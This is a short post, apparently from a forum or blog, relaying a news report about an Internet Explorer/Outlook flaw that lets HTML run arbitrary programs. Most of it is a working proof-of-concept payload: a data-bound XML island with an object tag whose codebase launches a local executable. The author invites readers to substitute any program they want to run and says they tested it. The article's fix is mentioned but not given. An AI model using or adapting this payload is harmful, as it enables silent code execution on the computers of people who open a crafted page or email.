The Register has just posted that IE/Outlook can run arbitrary commands with a simple bit of HTML. Read the rest here: http://www.theregister.co.uk/content/4/24274.html The article also has a simple fix for this problem. Here's the simple script: <span datasrc="#oExec" datafld="exploit" dataformatas="html"></span> <xml id="oExec"> <security> <exploit> <![CDATA[ <object id="oFile" classid="clsid:11111111-1111-1111-1111-111111111111" codebase="c:/windows/system32/calc.exe"></object> ]]> </exploit> </security> </xml> Change c:/windows/system32/calc.exe to the appropriate directory and filename you want to run. I've tested this myself, and it's REALLY scary.